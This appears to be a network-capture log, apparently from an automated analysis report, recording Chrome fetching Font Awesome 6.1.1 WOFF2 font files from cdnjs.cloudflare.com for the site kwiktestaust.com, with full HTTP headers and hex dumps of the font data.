                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: font
                                                                Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:07 UTC979INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:07 GMT
                                                                Content-Type: application/octet-stream; charset=utf-8
                                                                Content-Length: 154228
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=30672000
                                                                ETag: "623a082a-25a74"
                                                                Last-Modified: Tue, 22 Mar 2022 17:32:26 GMT
                                                                cf-cdnjs-via: cfworker/kv
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Timing-Allow-Origin: *
                                                                X-Content-Type-Options: nosniff
                                                                CF-Cache-Status: HIT
                                                                Age: 108640
                                                                Expires: Tue, 28 Oct 2025 20:40:07 GMT
                                                                Accept-Ranges: bytes
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJw1FTYMVf2HBNBIzhkO1UNSeazayx0KPV3vj59lkOgBnmo0hr%2BNTu2QqI18FWwChVX3s0x6ik1RjUuNB%2F%2FB5eWIXv%2F7XYaZjJ0rEsrOJEU5aoRhR0kc4ZvJez8Zof6v9vcHD6hd"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                Strict-Transport-Security: max-age=15780000
                                                                Server: cloudflare
                                                                CF-RAY: 8df022f5ffe4a91e-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-11-07 20:40:07 UTC390INData Raw: 77 4f 46 32 00 01 00 00 00 02 5a 74 00 0a 00 00 00 05 a0 28 00 02 5a 29 03 01 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 ab 28 00 81 8f 40 ca 94 d0 28 cb ab 2c 05 87 70 07 20 a5 13 d0 92 94 01 48 70 1e 00 00 b6 ea e7 61 44 8a 66 0f 4f 11 b0 71 00 00 e8 9a 07 40 55 55 55 55 d5 a4 84 80 c7 6c db 01 a8 aa aa e0 47 3f f9 d9 2f 7e f5 9b df fd e1 4f 7f f9 9b bf fb 87 7f fa 97 7f fb 8f ff fa 9f ff fb 4f 81 c1 b8 fb 07 c2 b4 6c c7 e5 f6 78 7d 7e c3 7f b5 df e7 b9 3d ef 03 ed 4e 88 27 c0 8e b8 a3 c2 0a 88 ca 47 75 40 af 8c 70 31 86 47 a8 08 19 e3 d6 66 2c cc a5 2a 10 cb 56 3c 5b 00 c4 57 08 e1 55 a6 57 23 f9 e4 02 90 13 e0 40 9e 82 ab ed f0 22 5b c9 44 f4 38 98 89 ca 8b 0b 4c b4 ed 37 49 a7 07 f5 bc 7f e0 4f a4 7b
                                                                Data Ascii: wOF2Zt(Z)8$ `(@(,p HpaDfOq@UUUUlG?/~OOlx}~=N'Gu@p1Gf,*V<[WUW#@"[D8L7IO{
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 57 bd 86 d7 af fb 41 37 0f ec 60 ef 74 2f 49 3b b0 33 2d 4b 96 76 64 4b b1 ec 18 d6 44 d1 84 6d 85 64 73 d0 e3 f8 12 db 41 85 d0 1b 62 85 d0 e3 23 d4 3f 1f c1 da 47 e4 4f ce 6d 2e 99 3d 9e ac 9c ff ea 75 78 fd 3a bc d7 9d 67 72 cf f4 cc f4 cc a6 09 bd 33 bd e1 f6 76 2e af 74 0a 7b a7 70 a7 78 a3 90 40 48 0b 02 24 04 42 23 a2 48 d6 01 06 04 18 34 72 42 02 3e 9c 13 c6 09 8d b0 fd 1d d2 19 27 1c b5 38 e2 84 0f 07 c0 81 be 9f 70 6a fd 3c d1 68 34 1a a1 67 e4 d8 71 2c 59 b6 e4 c4 4e 62 5b b6 95 b0 bb c0 6d 73 c4 5e 4c f7 30 dd ed 02 5d 7d c7 dd a3 dc c7 7e f6 27 ce 11 fb 13 77 3f 61 3e 10 39 3f cf cf d4 fe 9d 0b f4 de bb 0f 48 c0 4f d2 93 66 46 23 69 34 92 c6 9e 19 8f 4c b1 1d 3b 89 9d 34 71 a8 c9 04 37 61 a7 6d c2 6d a6 94 c2 52 da 85 94 33 05 5c f2 76 81 9b
                                                                Data Ascii: WA7`t/I;3-KvdKDmdsAb#?GOm.=ux:gr3v.t{px@H$B#H4rB>'8pj<h4gq,YNb[ms^L0]}~'w?a>9?HOfF#i4L;4q7ammR3\v
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 3a f3 fc ca e2 c9 d5 dc 28 56 bd 3c 5b 33 aa d5 ba 94 f6 2e ee 34 2a b9 77 b9 b3 5a 57 25 53 ec 90 d4 76 29 0c 73 a9 ca b3 f3 ce 2a f9 34 68 fc b5 0c c4 93 18 1b 5a ea 47 27 ab ee 6c 63 c7 de 95 cd d9 89 a9 b2 9c 94 b3 81 9c 37 02 76 4f 35 e6 30 1a 3f 8e 51 e4 82 f7 af cb 01 83 c5 bd f7 2b d5 de 34 ec 6e db 43 05 a3 d1 dd f9 d0 e1 f0 3c d1 6f 44 91 bb ce 26 2d 6d 95 c7 cb 14 89 03 c1 d3 81 8c 7a a0 87 c5 b8 72 f3 7b d4 c8 5c c8 b8 21 ef 3b 87 d5 ea a2 75 94 58 8a f8 e7 29 de 8b f6 d2 79 90 a8 66 dd 3a 30 18 d6 a0 2b 9d 21 cf e1 eb 90 7f ba b8 7d 1c 45 f1 36 22 b7 e9 90 d5 2e 9d 8f 32 bf c3 fa ca 67 ab 18 d4 cb 91 bd ed fa b4 f4 07 cc 93 b5 22 a7 2d ae 05 87 f4 1d df c6 63 19 97 f8 48 c7 a8 bf d3 90 65 e2 c9 9c 8d 6f cd 06 0f f7 90 38 b0 73 ef 5f 14 cc 5b
                                                                Data Ascii: :(V<[3.4*wZW%Sv)s*4hZG'lc7vO50?Q+4nC<oD&-mzr{\!;uX)yf:0+!}E6".2g"-cHeo8s_[
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 23 33 1a a3 33 26 63 31 21 13 31 31 93 33 05 d3 30 2d d3 31 3d 33 33 17 f3 b3 30 4b b3 0c 2b b3 26 6b b1 1e 1b b3 15 fb 72 04 c7 72 32 a7 72 06 67 71 36 e7 70 1e 17 71 33 b7 72 1b 77 f0 00 cf f1 32 ef f2 1e ef f3 01 1f f3 35 3f f2 1b bf f3 27 7f f1 9f 02 15 46 11 94 58 99 94 5b f9 54 4e e5 55 59 55 d5 48 1d d5 47 7d d5 5f 03 34 42 13 34 51 93 34 59 d3 34 5d b3 34 5f 0b b5 58 2b b5 56 bb b5 47 fb b4 5f 07 74 50 87 74 58 47 75 5c 27 74 59 37 74 53 0f f5 4a 6f f4 5e 9f 24 7d d3 4f fd b3 50 16 d1 12 5a 62 4b 6b d9 2d af 35 b0 46 d6 d4 5a d8 30 1b 6e 63 6c aa ad b2 23 76 cc 4e d9 39 bb 62 d7 ec 91 3d b5 57 f6 c9 7e db 5f fb ef a1 3d aa 27 f7 94 9e d3 73 7b 7e 2f e8 45 bc 98 97 f0 52 5e c6 2b 78 65 af ea 35 bc ae 37 f2 26 de dc 5b 7b 27 ef ee 3d bd 9f 0f f2 21
                                                                Data Ascii: #33&c1!1130-1=330K+&krr2rgq6pq3rw25?'FX[TNUYUHG}_4B4Q4Y4]4_X+VG_tPtXGu\'tY7tSJo^$}OPZbKk-5FZ0ncl#vN9b=W~_='s{~/ER^+xe57&[{'=!
                                                                2024-11-07 20:40:07 UTC1369INData Raw: c0 4d c1 4d dc d8 8d dc c0 f5 c1 f5 5c 17 5c c7 b5 5d cb 65 2c c7 1c fc 96 f3 39 2f 38 8f 73 3b a7 fe d1 5f d0 1f fd d0 17 7d d4 0b d0 73 d0 33 3d d5 23 3d 04 3d 00 dd d7 3d dd d1 2d 5d d1 25 9d d5 19 1d 03 1d 06 1d d4 01 ed 01 ed 06 d0 66 d0 26 d0 06 00 ad 00 2d d3 52 2d d6 0c d0 34 d0 54 d0 94 be ff b5 ef 44 d0 58 8d 01 0d d5 10 0d d6 40 f5 57 1f f5 52 0f 75 51 47 b5 53 7d d5 53 55 50 89 f8 37 fe 89 3f f1 1b 20 1e c6 cd 38 15 fb 63 5f ec 8e 1d b1 35 b6 c4 c6 58 1f ab 63 49 cc 80 98 1a e3 63 58 f4 89 de d1 2e da 46 eb 68 15 2d a2 79 34 8b a6 d1 24 1a 46 fd a8 17 75 a2 46 54 8d 2a 51 39 2a 44 f9 c8 a2 6c 94 86 28 1e c5 a2 68 44 a4 28 12 85 23 2f a4 ff d3 9f f4 23 7d 4b 5f d3 97 f4 39 bd 4d 2f d3 f3 f4 34 3d 86 74 35 9d 87 74 0e d2 59 48 67 20 9d 4e a7 d2
                                                                Data Ascii: MM\\]e,9/8s;_}s3=#===-]%f&-R-4TDX@WRuQGS}SUP7? 8c_5XcIcX.Fh-y4$FuFT*Q9*Dl(hD(#/#}K_9M/4=t5tYHg N
                                                                2024-11-07 20:40:07 UTC1369INData Raw: d0 88 a2 00 0d f3 01 c0 7e 05 32 40 06 10 20 01 72 80 02 75 80 ba 40 00 1a 01 ad 81 02 40 3b 60 0c 50 0a 98 0c 4c 06 ca 03 53 80 29 40 05 60 2a 30 15 a8 08 4c 03 a6 01 95 80 e9 c0 74 a0 32 30 03 98 01 54 01 66 f2 b7 a8 0a cc 2a aa 01 b3 8b ea c0 9c a2 06 30 b7 88 81 79 45 06 98 5f 64 81 05 45 02 2c 2c f2 80 45 45 0e 58 5c a4 c0 92 a2 26 b0 b4 a8 05 2c 2b 6a 03 cb 8b 3a c0 8a a2 2e b0 b2 a8 07 ac 2a ea 03 ab 8b 06 c0 9a 83 1a 02 17 43 37 02 97 42 37 03 57 42 9f 00 ae 86 76 02 ae 83 15 04 6e 83 de 05 dc 0d ed 0c bc 0e d9 07 fc 0e fb 08 e2 32 90 d7 21 ae 0a ed 0b 71 35 68 3f 88 5b 43 bb 41 dc 06 da 1d e2 4b a0 67 20 be 02 ba 09 e2 2b a1 5b 21 be 0a fa 0a c4 d7 40 37 40 7c 0b fc 3d 88 ef 40 68 04 f1 bd d0 2d 90 c9 c2 0a 40 e6 20 e4 05 c8 1c 82 bc 04 99 c3 90
                                                                Data Ascii: ~2@ ru@@;`PLS)@`*0Lt20Tf*0yE_dE,,EEX\&,+j:.*C7B7WBvn2!q5h?[CAKg +[!@7@|=@h-@
                                                                2024-11-07 20:40:07 UTC1369INData Raw: e5 c8 65 c9 15 68 0f 93 2b 0a 71 28 b9 52 66 1c 44 ae 4c ae 45 7b 9c 5c 87 dc bc ad d9 e4 16 a0 3d 47 6e 89 f6 3c b9 55 4f 7b 99 dc 86 dc a9 bd de e4 ce c0 20 72 17 b4 b7 c9 5d 27 34 90 dc 8d dc 8b f6 0e b9 0f 79 14 ed 43 f2 18 65 b4 ef c9 e3 c9 93 68 3f 90 27 0b 71 06 79 0a e2 4c f2 54 b4 22 4f 33 b6 09 a7 f3 33 b6 9f c9 33 c9 b3 68 bf 90 e7 90 e7 d2 7e 23 cf 27 2f a4 fd 41 5e 24 c4 c4 e4 c5 68 37 91 97 4c d8 fe 26 af 20 af a2 fd 43 5e 43 5e 4b fb 9f bc 4e 3d b1 30 79 3d 79 d7 f5 7d db 21 ef 21 ef 23 46 90 cf 90 2f 11 a3 c9 57 c8 57 89 a9 c8 b7 c8 8f 88 69 c8 4f 30 7e 76 db 67 e4 e7 fb 2a 4d 7e d1 61 c0 79 64 8f f6 19 f9 65 4f 4b f2 2b f2 c7 36 d6 56 32 c9 5f 89 05 c8 df 40 b7 08 f9 3b e2 44 f2 8f cc b8 8e fc 93 fc 9f 58 94 42 0d de cf 6c 6a 08 19 dd 26
                                                                Data Ascii: eh+q(RfDLE{\=Gn<UO{ r]'4yCeh?'qyLT"O333h~#'/A^$h7L& C^C^KN=0y=y}!!#F/WWiO0~vg*M~aydeOK+6V2_@;DXBlj&
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 1c d9 85 f6 02 ed 15 b2 37 ed 35 da eb e4 00 da 9b b4 b7 c9 41 b4 0f 48 e4 50 da c7 22 87 d1 3e f5 c8 e1 b4 cf 69 5f 90 23 68 5f 49 e4 28 da b7 22 47 d3 7e 10 39 86 f6 8b c8 b1 b4 df 3d 72 1c ed 3f b4 ff 92 e3 a9 61 24 72 22 15 91 93 a8 31 45 4e a6 c6 11 39 85 9a 48 e4 54 6a 0a 91 d3 a8 a9 36 62 4e a7 a6 a5 a6 23 67 50 33 51 33 93 b3 a8 d9 a9 39 c9 39 d4 02 f2 c8 f9 d4 22 d4 a2 e4 02 6a 29 89 5c 44 2d 2b 72 31 b5 82 c8 25 d4 ca 22 97 52 6b 88 5c 46 ad e5 91 cb a9 75 a8 f5 c8 15 d4 86 f2 c8 d5 d4 66 d4 e6 e4 1a 6a 6b e5 cc 75 d4 b6 d4 f6 e4 7a 6a 27 6a 17 72 13 b5 9b 44 6e a5 f6 10 b9 8d da 57 e4 76 6a ff 9c b9 83 3a 90 3a 88 dc 49 1d 42 1d 4a ee a6 8e 50 ce dc 4b 1d 45 1d 4b ee a3 4e a0 4e 22 0f 51 e7 2b 67 1e a5 2e a4 2e 21 8f 51 57 52 57 91 a7 a8 1b 24
                                                                Data Ascii: 75AHP">i_#h_I("G~9=r?a$r"1EN9HTj6bN#gP3Q399"j)\D-+r1%"Rk\Fufjkuzj'jrDnWvj::IBJPKEKNN"Q+g..!QWRW$
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 91 78 04 ca bf 90 f0 38 ca bf 92 b8 09 ca 85 e8 54 94 7f 27 fa 11 e5 bf 2b 54 5b 1d fa 6f 25 07 f4 29 72 41 e2 72 e4 46 e2 58 e4 b5 88 2e 46 5e 87 e8 12 e4 75 49 f8 05 79 3d 12 1e 43 5e 9f e8 08 e4 8d 89 7e 42 de 84 e8 7c e4 4d 89 fe 46 de 8c 84 91 c8 9b 93 f0 14 f2 16 44 57 21 6f 49 42 23 e4 ad 48 38 17 79 77 a2 f7 91 f7 24 a1 0e f2 5e c4 de 46 de 8f d8 71 c8 87 91 b0 00 f9 70 0b 6e 26 c4 2e 41 3e 9b d8 ad c8 e7 90 78 2d f2 b9 c4 ae 47 3e 8f d8 2d c8 e7 13 7b 04 f9 02 62 ef 20 5f 4a 74 06 f2 ed d5 7e 89 ef 84 fa 47 e2 bb 42 ec 2b e4 7b 92 f0 2e f2 bd 89 7d 83 7c 7f f5 95 c4 0f 84 54 2b 91 1f 46 42 6f e4 c7 a8 bf 26 7e 1c 24 4e 45 7e 3c b1 75 c8 4f 20 e1 39 e4 67 92 6a 32 f2 b3 48 34 e4 57 68 99 4f fc 4a 48 5c 85 fc 1a a2 ab 91 5f 4b c2 93 c8 af d3 32 99
                                                                Data Ascii: x8T'+T[o%)rArFX.F^uIy=C^~B|MFDW!oIB#H8yw$^Fqpn&.A>x-G>-{b _Jt~GB+{.}|T+FBo&~$NE~<uO 9gj2H4WhOJH\_K2
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 4a c2 58 72 d3 f4 fc 72 58 32 f9 3e 8d 61 b9 12 71 43 37 4c 87 73 2f 8e dc 5e b5 3c cc 4e f3 83 72 18 33 26 71 c6 98 5c 24 9a 46 74 c7 11 82 9a 1a 21 84 50 6e fb ca 30 2d c9 d1 60 16 97 95 6a a3 16 84 b6 a5 b5 56 fb 17 4a 11 35 4a 99 c9 b9 e0 86 6e 50 d3 d4 4c 6e fb ae 61 52 f5 93 d5 ac 05 01 b3 48 2a 19 bb 1e a3 0e 00 a7 38 f5 e3 d9 15 00 98 a5 bd 36 45 d3 71 f3 e0 68 b8 91 1b a3 a2 37 2a b2 3c cb 4d 6a d2 38 89 13 c3 a4 bd 58 69 54 e4 7e 2e bc cf 16 c2 9e cf 18 b3 85 b0 71 cc d8 fc b7 aa be 8f e8 fb d5 cf bb 46 48 dd 0b f7 31 36 9f d9 42 d8 8c e1 d8 16 c2 be af 97 67 ad fa 3e 4e df f7 08 20 94 f7 76 f0 33 b8 0d e7 03 74 cc b4 bd 8e 76 35 fb 56 8b d1 26 9a 6f 46 12 37 f0 d6 d5 4f e2 1a 5a 7a 06 35 15 3a 45 7e fc 84 ed 5b d6 3d 8c 09 61 db f7 5a 96 6f 9b
                                                                Data Ascii: JXrrX2>aqC7Ls/^<Nr3&q\$Ft!Pn0-`jVJ5JnPLnaRH*86Eqh7*<Mj8XiT~.qFH16Bg>N v3tv5V&oF7OZz5:E~[=aZo


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.1649746104.17.24.144436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:07 UTC654OUTGET /ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2 HTTP/1.1
                                                                Host: cdnjs.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Origin: https://kwiktestaust.com
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: font
                                                                Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:07 UTC985INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:07 GMT
                                                                Content-Type: application/octet-stream; charset=utf-8
                                                                Content-Length: 105536
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=30672000
                                                                ETag: "623a082a-19c40"
                                                                Last-Modified: Tue, 22 Mar 2022 17:32:26 GMT
                                                                cf-cdnjs-via: cfworker/kv
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Timing-Allow-Origin: *
                                                                X-Content-Type-Options: nosniff
                                                                CF-Cache-Status: HIT
                                                                Age: 182178
                                                                Expires: Tue, 28 Oct 2025 20:40:07 GMT
                                                                Accept-Ranges: bytes
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2FeSwVrituskZy1m40oNvDSutPayxVKL1oE9bwFtc9ZYX8%2FCYFH0t%2Frn73uSDBsItUScRuqz%2BdYSMTQ%2FV8Aes6KiRgRoJurqXngona47Dc0L32WdTwXDZn%2F1J4I%2BAcQTJEqlGVbY"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                Strict-Transport-Security: max-age=15780000
                                                                Server: cloudflare
                                                                CF-RAY: 8df022f60ea32c92-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-11-07 20:40:07 UTC384INData Raw: 77 4f 46 32 00 01 00 00 00 01 9c 40 00 0a 00 00 00 02 af a4 00 01 9b f6 03 01 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 8f 50 00 8d 48 ca 8a a8 1c cb 8f 54 05 88 20 07 20 a5 d1 57 51 67 00 82 f3 00 00 b0 56 3f 0f aa 48 d7 49 ed 1e 00 55 d5 3a 31 b8 a9 1a 10 7e fa e5 b7 3f fe fa e7 bf bf 0a 8c dd 0d b1 8e eb f9 86 ff fa fd ca 73 fb ff 99 79 0b c4 2a 8a f0 85 59 ae 4b 45 46 c8 0e 94 1f b5 b1 ec 53 51 ab 52 5d d1 a4 48 11 48 40 95 6f 61 8e b6 88 fa e3 a3 7e 3f c4 dd 7b 26 40 67 36 69 8a fb 61 db db d0 55 12 e6 a5 e6 b0 7a 35 f5 a3 b8 78 c2 af a8 ff 3c aa ea df f3 00 bc 87 87 49 90 00 1e 87 c4 05 12 90 2c c9 22 09 12 b0 a5 d8 92 57 1a 37 76 e2 24 76 b3 7f 9c 74 8c e9 46 5d e9 da e9 58 ea 58 5b e9 1f 6b a9 fd
                                                                Data Ascii: wOF2@8$ `PHT WQgV?HIU:1~?sy*YKEFSQR]HH@oa~?{&@g6iaUz5x<I,"W7v$vtF]XX[k
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 95 5f 11 4f dd 53 f1 74 04 f1 bf 2d a5 62 f6 81 14 3e e2 d9 4e 45 24 63 ad 07 4f a9 09 41 54 e1 9f aa eb fb 93 77 20 e5 48 8d 41 f7 1b 79 4b 36 aa f1 50 59 51 95 03 e3 63 ef 25 c4 a5 b8 b4 fc ff f7 7d d3 ca 69 a4 36 ce d5 58 1b b7 b1 d1 18 17 3a 1f 44 7b 9f fb 82 7b df fb c1 7d 1f 08 ee ff 40 f0 3e 50 c1 03 aa 82 f7 81 0a 1e 50 7c 1f 80 d8 1f a8 92 1a 55 64 f7 42 51 ec 5e 25 b3 66 15 25 4d af 62 89 dd 8b 52 b7 7f 1f 68 f3 81 6a f3 50 55 6b cd 03 a9 e0 81 6c f3 8b 1a 03 92 63 8a ea a9 22 c7 d0 05 a2 a4 35 4b 6e b4 c8 a6 da 19 4a 63 b4 26 9a c9 26 9c 09 e3 22 95 14 39 1d 8c f1 d9 04 51 60 8c f3 c7 d0 de e4 fe 1a 6d 12 45 c0 c7 f2 3a 4d c6 0c ff bb a6 15 5c 88 90 79 49 4d 64 5a 5d be d5 5d aa 49 08 d8 2a a3 91 a2 23 74 f4 73 68 6b 97 75 dc e0 20 04 4c 64 99
                                                                Data Ascii: _OSt-b>NE$cOATw HAyK6PYQc%}i6X:D{{}@>PP|UdBQ^%f%MbRhjPUklc"5KnJc&&"9Q`mE:M\yIMdZ]]I*#tshku Ld
                                                                2024-11-07 20:40:07 UTC1369INData Raw: c2 ff ff 22 52 46 ca 4a 3d e9 2e b6 f9 2d b5 f6 c6 7a 73 3f b9 6c ec 30 7f fa 87 ae f7 5f 5c 5e a3 48 5f 0c c0 40 0c c3 08 8c c4 78 4c c3 2c cc df fe 24 dc 80 2d d8 86 53 b8 84 07 78 86 78 7c 83 cf d4 cc c8 6c cc c9 b2 2c c7 2a ac ce 86 ec c2 6e ec c9 c1 1c c6 49 9c c6 59 5c c1 95 78 d0 4b f4 4a bd 59 6f d7 bb f4 6e bd 4f 1f d3 97 f4 63 fd 5a bf 33 1d 4d 37 33 cc 8c 35 13 cd 34 33 d3 cc 37 cb cd 6a b3 de 6c 31 87 cc 39 73 d1 5c 31 db 6a 37 cc 3d f3 c0 bc 35 ef cd 97 ed fe 06 4c 96 1f e4 e7 f1 43 fc 18 bf 80 5f 68 fb 7d ff c9 ff e2 7f 0d 88 cb af ef 2a 9a dc 29 79 c4 2f 3d 2f 79 69 f2 de e4 83 c9 27 7f 77 de 26 7f 4c 29 99 52 e5 cb 77 f6 9b ec 07 d9 37 e9 a7 bf b3 e1 b9 5e b8 07 4f ba ef dd e7 ee 53 f7 98 7b 24 a1 6f 02 c5 bf 8f ef 1e 5f 32 5e c4 a5 c7 ed
                                                                Data Ascii: "RFJ=.-zs?l0_\^H_@xL,$-Sxx|l,*nIY\xKJYonOcZ3M735437jl19s\1j7=5LC_h}*)y/=/yi'w&L)Rw7^OS{$o_2^
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 9a 05 da 99 71 c1 c5 47 b6 25 60 59 b6 67 f5 9a a3 85 96 6d c7 dd 0b 1e 5a 39 61 c6 dc 69 b5 5a cb e8 9c b3 5d 47 9a 76 d6 2e 93 a4 d9 ec 44 60 7c 72 75 4d 3f a0 be bc 79 ec d2 d2 42 0b be 37 a5 4e 04 8d 03 18 d4 5c 6c 33 79 2f 56 b1 c0 55 fb 56 d5 34 1d 4d e3 bf f4 6b 60 9c 02 a8 6a 99 26 9e 34 df a9 e8 c2 75 1c 5c 70 96 86 5f a9 dc 4b 11 de b3 da 34 a6 d3 44 43 43 44 5c 70 31 b7 5a e4 d8 ad 69 96 ae 3b 71 3b 17 5c 24 69 86 41 ad 76 e5 f5 7f 87 c1 49 80 e1 a0 e8 16 83 21 90 d4 3d 0f c3 41 b1 5d 0c 86 f0 bc fa f3 ba ad 6a 15 a8 56 5b ef 43 a3 ed 66 6f 77 bf 3a 98 71 d8 7f 38 28 66 83 6a ab d9 6d d9 bf db 6c 55 df 86 6a b5 45 7d 82 ad 6a 15 f3 bd d6 0e 9b 8e b4 69 94 33 c7 62 15 ab aa d0 98 94 c5 cf 48 9f 4b 07 46 0d 76 0d 98 35 ee fb 8e 5b 73 db 34 d8 bd
                                                                Data Ascii: qG%`YgmZ9aiZ]Gv.D`|ruM?yB7N\l3y/VUV4Mk`j&4u\p_K4DCCD\p1Zi;q;\$iAvI!=A]jV[Cfow:q8(fjmlUjE}ji3bHKFv5[s4
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 77 de e8 72 d3 75 9c 67 fe 09 62 d5 ef c7 31 de 43 04 ea 1c ec e3 32 76 e9 f8 7d 0c dc 19 ed d8 fd f2 0e 63 47 bb 16 b4 81 a8 22 76 34 de 43 fe f2 83 52 e0 17 ac f5 f4 f0 fa ca a1 86 63 18 3a 77 6c 77 73 32 69 45 3a 57 f5 ad 41 3a 54 ca 94 87 ce bc c2 e5 42 d7 6c c7 3d 35 1c 7a b5 ed df 3d 67 8e 34 43 c0 b1 6d 6e 3b ae 63 18 86 e2 86 6f 37 db 41 10 58 15 bf d3 9e 8e 17 56 07 ba 6d 7b 2e e7 5a a0 69 b6 13 77 2a af a3 2b ed f6 94 7f d4 da fc 36 33 23 17 27 74 1c 6a 9a 62 d6 ec 1f a8 d5 e0 b2 c1 9c bf 9a cb 84 75 91 a4 9b fe 0e ad 39 c8 88 5e 3f 7b f6 cb ec b0 a2 bc e1 86 b2 68 0e 07 85 78 87 eb f5 f8 de 85 a2 60 ac 28 2e 7c ef 11 cd fe de 6c 30 00 06 83 59 5d c7 75 a9 bf 8c 8b 34 d3 9e 43 d8 c2 7a 18 0b 21 f7 43 e5 ae 9e ff c2 17 19 8e e3 b8 86 ae e3 69 73
                                                                Data Ascii: wrugb1C2v}cG"v4CRc:wlws2iE:WA:TBl=5z=g4Cmn;co7AXVm{.Ziw*+63#'tjbu9^?{hx`(.|l0Y]u4Cz!Cis
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 23 8c df 79 f8 bf 9e 79 07 91 bd 2c 77 0f bb 54 a5 98 0e 13 0d 0d 84 7e 24 f0 e4 cf a6 59 9a 0d 83 5e a0 25 b3 44 d7 53 c6 0b 0c f0 bb ea ac c4 8a ed 86 9e eb ba 61 e4 7a 9c db f3 3f c6 de d9 19 2a 4b ad 38 72 6c db 89 e2 66 c5 73 9d 23 5f e4 ae 1b c6 ae e7 79 91 63 db fc df e6 db d8 9b bf b2 de f2 dc 58 2d 2c c4 ca 75 0d c3 b9 ce 21 4e 74 b0 ff fc ce fb 1a ba 85 1e 41 cf a5 0f 10 95 b3 b5 35 cd d2 44 ba 9c 26 fa 49 3f 49 9f e4 84 0a a3 30 d2 9c 53 b1 8a cb 49 3e c9 a5 24 50 ba 3d d3 d9 74 56 98 39 45 a5 39 86 0b 2e ca ba 86 e2 62 a0 cc e5 08 da 31 5a 28 78 c2 93 7e d2 cf fa 59 3a 4b 67 d3 d9 b4 9c 96 45 5e e4 93 7c a2 26 2a 8e e2 28 8c 42 b1 df f5 7c 3f 58 5c 0c 84 ef ab 2b 32 f6 ea 8d 90 1b 06 8f ea 75 2f 96 06 29 bd 56 30 b6 bd 8a 57 c6 71 1c b7 56 57
                                                                Data Ascii: #yy,wT~$Y^%DSaz?*K8rlfs#_ycX-,u!NtA5D&I?I0SI>$P=tV9E9.b1Z(x~Y:KgE^|&*(B|?X\+2u/)V0WqVW
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 5c c5 5b 98 e4 45 ae e2 2d 4c f3 a2 54 71 99 15 a5 9a cc b2 a2 54 93 b2 58 47 51 4e f3 b2 58 47 31 bb b7 78 0b 45 26 9a cd e6 a7 d3 2c 9f 1c c3 54 24 ee 4c 6f e9 72 ee 1b d2 65 c0 ec 1d c7 2a e1 55 eb 6f 22 56 59 59 ac 23 8f 92 b4 cc 8a 92 18 82 a3 1a 75 ae 98 0b 9e 28 85 72 45 36 ca 6c 66 a9 74 05 45 a9 e2 2d 2d 7e 3d c1 3b 88 45 d2 5f 44 28 b8 c8 dc 73 ea 54 a6 cf ca ff 2a 62 3c 51 b1 e0 09 fe 3f 46 cd 30 eb f0 75 d9 00 60 69 b2 c9 18 97 0d c6 c0 a4 d2 98 a1 99 91 a6 49 dd 0c 34 cd e3 dc d3 b4 c0 d4 25 c0 58 64 6a 06 d3 94 64 60 ac 21 39 63 0d 83 31 66 01 68 48 dd 47 dd 34 6a 88 39 8f af 71 2c 63 cc 68 7c 7d 2f a6 bd 58 8c 01 5f 8f 02 63 ea f3 e7 dd d4 9f 02 23 21 ee 77 75 73 b8 bc 94 9a 9a db 35 cd b7 69 da 1a 46 ba 65 71 30 4d 63 a6 b0 ae 37 a5 10 42
